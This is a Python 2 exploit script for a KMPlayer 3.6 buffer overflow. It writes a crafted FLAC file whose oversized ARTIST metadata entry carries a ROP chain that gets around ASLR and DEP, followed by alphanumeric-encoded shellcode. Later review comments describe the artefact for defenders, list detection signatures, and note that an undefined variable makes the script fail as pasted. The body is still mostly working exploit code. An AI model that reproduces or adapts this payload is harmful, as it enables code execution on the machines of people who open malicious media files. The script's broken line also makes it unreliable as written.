# NOTE(review): Python 2 script (statement-form `print`, `raw_input` at the end)
# that writes a crafted .flac file to disk; it performs no network or process
# interaction itself.  The comments added below describe only what the visible
# code emits, so that a defender can recognise the artefact: a FLAC container
# whose metadata carries an "ARTIST=" entry several hundred kilobytes long,
# padded with long runs of 'A'/'B'/'Z' and the markers "DEAD"/"BEEF"/"SWEE".
from socket import *  # unused: nothing below calls a socket API
import sys            # unused
import struct         # the only import actually used (struct.pack throughout)
import time           # unused
"""
Kmplayer 3.6 Buffer Overflow exploit
*Very* Low Reliablity :I
By sweetchip
"""
print "\n[*] Kmplayer Exploit | Bypadd ASLR. DEP | ASCII only"
print "[*] Author : sweetchip | 2013.04.18\n"
print "[*] Public Release Date : 2015.11.12"
# Output path; written relative to the current working directory.
filename = "Exploit_bypass_ASLR_DEP.flac"
# Header
# Head1 starts with \x66\x4C\x61\x43 == "fLaC", the FLAC stream marker, so the
# generated file is a FLAC container.  The remaining header bytes are taken
# verbatim from the author; they presumably form the first metadata block
# (STREAMINFO) -- not confirmed against the FLAC spec here.
Head1 = ("\x66\x4C\x61\x43\x00\x00\x00\x22\x10\x00\x10\x00\x00\x0B\x3E\x00\x2E"
"\x50\x0B\xB8\x02\xF0\x00\x91\x57\x93\x6F\x0C\x93\x12\xF9\xE0\x24\xF7"
"\x6B\x80\x38\x24\x7A\xBC\x64\x5A\x04")
# Seven fixed bytes placed between the computed length (payloadlen) and the
# length-prefixed artist entry below; their meaning is not documented on the page.
head2 = "\x00\x00\x00\x01\x00\x00\x00"
# Four trailing bytes appended after the artist entry.
EndofHead = ("\x81\x00\xA4\x46")
# cmd = calc
# encoder - x86/alpha_mixed
# Every byte of this blob is printable ASCII (0x30-0x7A), consistent with the
# "ASCII only" banner above; per the author's comment its payload launches calc.
shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42"
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x7a\x48"
"\x6c\x49\x55\x50\x53\x30\x43\x30\x55\x30\x4c\x49\x49\x75"
"\x54\x71\x4e\x32\x32\x44\x6c\x4b\x33\x62\x70\x30\x4e\x6b"
"\x62\x72\x56\x6c\x4c\x4b\x72\x72\x44\x54\x4e\x6b\x71\x62"
"\x35\x78\x64\x4f\x4d\x67\x42\x6a\x57\x56\x44\x71\x59\x6f"
"\x70\x31\x79\x50\x6e\x4c\x77\x4c\x70\x61\x61\x6c\x46\x62"
"\x44\x6c\x55\x70\x5a\x61\x68\x4f\x54\x4d\x67\x71\x58\x47"
"\x6a\x42\x58\x70\x32\x72\x71\x47\x4e\x6b\x46\x32\x52\x30"
"\x4e\x6b\x30\x42\x75\x6c\x75\x51\x6a\x70\x6e\x6b\x31\x50"
"\x50\x78\x4d\x55\x69\x50\x53\x44\x72\x6a\x37\x71\x38\x50"
"\x66\x30\x4e\x6b\x37\x38\x64\x58\x4e\x6b\x43\x68\x77\x50"
"\x36\x61\x59\x43\x6a\x43\x67\x4c\x73\x79\x4c\x4b\x54\x74"
"\x4e\x6b\x77\x71\x7a\x76\x55\x61\x79\x6f\x65\x61\x69\x50"
"\x4e\x4c\x69\x51\x5a\x6f\x44\x4d\x46\x61\x78\x47\x50\x38"
"\x49\x70\x30\x75\x4a\x54\x65\x53\x71\x6d\x38\x78\x75\x6b"
"\x73\x4d\x65\x74\x72\x55\x59\x72\x62\x78\x4c\x4b\x53\x68"
"\x36\x44\x57\x71\x69\x43\x62\x46\x6e\x6b\x74\x4c\x42\x6b"
"\x4c\x4b\x31\x48\x47\x6c\x63\x31\x78\x53\x6c\x4b\x37\x74"
"\x4e\x6b\x33\x31\x4a\x70\x6d\x59\x42\x64\x44\x64\x47\x54"
"\x51\x4b\x33\x6b\x35\x31\x31\x49\x33\x6a\x73\x61\x79\x6f"
"\x59\x70\x62\x78\x33\x6f\x33\x6a\x4e\x6b\x64\x52\x5a\x4b"
"\x6c\x46\x53\x6d\x30\x6a\x33\x31\x6c\x4d\x4e\x65\x4f\x49"
"\x45\x50\x33\x30\x37\x70\x36\x30\x51\x78\x46\x51\x6c\x4b"
"\x50\x6f\x6e\x67\x79\x6f\x78\x55\x4f\x4b\x48\x70\x4d\x65"
"\x6c\x62\x31\x46\x33\x58\x6c\x66\x4c\x55\x6f\x4d\x4d\x4d"
"\x4b\x4f\x48\x55\x35\x6c\x55\x56\x63\x4c\x77\x7a\x6d\x50"
"\x79\x6b\x39\x70\x74\x35\x45\x55\x4f\x4b\x62\x67\x46\x73"
"\x74\x32\x42\x4f\x63\x5a\x45\x50\x53\x63\x69\x6f\x4b\x65"
"\x55\x33\x43\x51\x52\x4c\x61\x73\x37\x70\x41\x41")
#############################################################################################################################################
##### ROP
##### special thanks to mona and corelan team
#############################################################################################################################################
# NOTE(review): every gadget address below is a fixed constant that the
# author's annotations attribute to PProcDLL.dll, bass.dll and bass_wv.dll.
# A chain like this only works if those plugin modules load at the same base
# every time, i.e. they presumably lacked ASLR support at the time (the
# "Bypass ASLR" claim in the banner rests on that).  Defender takeaway:
# keep the player updated and enforce mandatory ASLR / DEP for its plugin
# DLLs so fixed-address chains stop being viable.
rop_gadgets = ""
rop_gadgets += struct.pack('<I',0x10064b1f)# XCHG EAX,ESP # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x10126c47) #POP EAX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x11047e74) # ptr to &VirtualProtect() [IAT bass.dll]
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
# "DEAD", "BEEF" and "SWEE" below are literal four-byte fillers consumed by the
# RETN 0x04 gadgets; they are a handy static signature for this file.
rop_gadgets += "DEAD"
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += "BEEF"
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += "SWEE"
# The same 4-byte gadget address repeated 337 times (1348 bytes of identical dwords).
rop_gadgets += struct.pack('<L',0x10120637) * 337 # INC EAX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x11022f69) # MOV EAX,DWORD PTR DS:[EAX] # RETN [bass.dll]
rop_gadgets += struct.pack('<L',0x11033e30) # XCHG EAX,ESI # RETN [bass.dll]
rop_gadgets += struct.pack('<L',0x10060210) # POP EBP # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x10146f65) # PUSH ESP # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x11010754) # POP EBX # RETN ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += struct.pack('<L',0x00005050) # 0x00005050 -> ebx (the original comment said 0x00000201, but the packed value is 0x5050)
rop_gadgets += struct.pack('<L',0x10126623) # POP EDX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x00000040) # 0x00000040-> edx
rop_gadgets += struct.pack('<L',0x1013555c) # POP ECX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x7d782020) # Writable location 7d782020 (a fixed OS-level address; which module it belongs to is not stated on the page)
rop_gadgets += struct.pack('<L',0x10120b13) # POP EDI # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x100d0240) # RETN (ROP NOP) [bass_wv.dll]
rop_gadgets += struct.pack('<L',0x10126c47) # POP EAX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x44444444) # inc inc inc inc lol  (0x44444444 == "DDDD" on disk)
rop_gadgets += struct.pack('<L',0x1001442e) # PUSHAD # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
#############################################################################################################################################
# stage1 = 3028 bytes of 'C', then the ROP chain, then the ASCII shellcode.
stage1 = ""
stage1 += "C" * 3028
stage1 += rop_gadgets
stage1 += shellcode
#65536
# trigger a BOF / and will Execute shellcode
# The artist entry is "ARTIST=" followed by 64848 bytes of 'A', three fixed
# addresses separated by 137 more 'A', 'B' padding up to a 140000-byte region,
# and then stage1 repeated seven times on a 65536-byte stride ('Z' fills the
# gap after each copy -- that is what the "#65536" comment above refers to).
# The length-prefixed "KEY=value" shape (see artistlength below) looks like a
# FLAC VORBIS_COMMENT entry -- confirm against the FLAC spec.  For detection:
# a legitimate tag is a few bytes, not hundreds of kilobytes of 0x41/0x42/0x5A.
artist = "ARTIST="
artist += "A" * 60000
artist += "A" * 4848
artist += struct.pack('<I', 0x7d79192c)
artist += "A" * 137
artist += struct.pack('<I', 0x10402f0f) # POP ESP # RETN ** [bass_flac.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
artist += struct.pack('<I', 0x7d791930) # ptr to 7d791930 (the original comment said 7d761930; the packed value is 0x7d791930)
artist += "B" * (140000 -4848-4-4-4-137)
artist += stage1
artist += "Z" * (65536-len(stage1))
artist += stage1
artist += "Z" * (65536-len(stage1))
artist += stage1
artist += "Z" * (65536-len(stage1))
artist += stage1
artist += "Z" * (65536-len(stage1))
artist += stage1
artist += "Z" * (65536-len(stage1))
artist += stage1
artist += "Z" * (65536-len(stage1))
artist += stage1
artist += "Z" * (65536-len(stage1))
#artist += "C" * 3028
#artist += rop_gadgets
#artist += shellcode
# NOTE(review): `sartist` is never assigned anywhere above, so as pasted this
# statement raises NameError and the script stops here before any file is written.
sartist += "A" * 100000
# 4-byte little-endian byte length of the artist entry, placed directly before it.
artistlength = struct.pack('<I', len(artist))
# length
# Big-endian, multiplied by 256 (i.e. shifted left one byte); presumably so the
# 3-byte big-endian length of a FLAC metadata block header lands in the right
# position -- not verified here.
payloadlen = struct.pack('>I', len(head2 + EndofHead + artistlength + artist)*256)
# Payload.
# Final layout: Head1 | payloadlen | head2 | artistlength | artist | EndofHead | 118000 NUL bytes.
exploit = Head1
exploit += payloadlen
exploit += head2
exploit += artistlength
exploit += artist
exploit += EndofHead
exploit += "\x00" * 118000
print "\n[*] Generating Flac file....."
print "[ ] Payload size :", (len(exploit))
print "[ ] Shellcode size : \n"  # prints no number: len(shellcode) is never passed
# Opened in text mode ('w'), not binary, even though the content is raw bytes;
# closed explicitly rather than via `with`.
f = open(filename,'w')
f.write(exploit)
f.close()
print "[*] Malicious File generated Successfully!!!"
print "[ ] file name : " + filename
raw_input("\npress enter to continue :D . . . . .")
#End OF Source.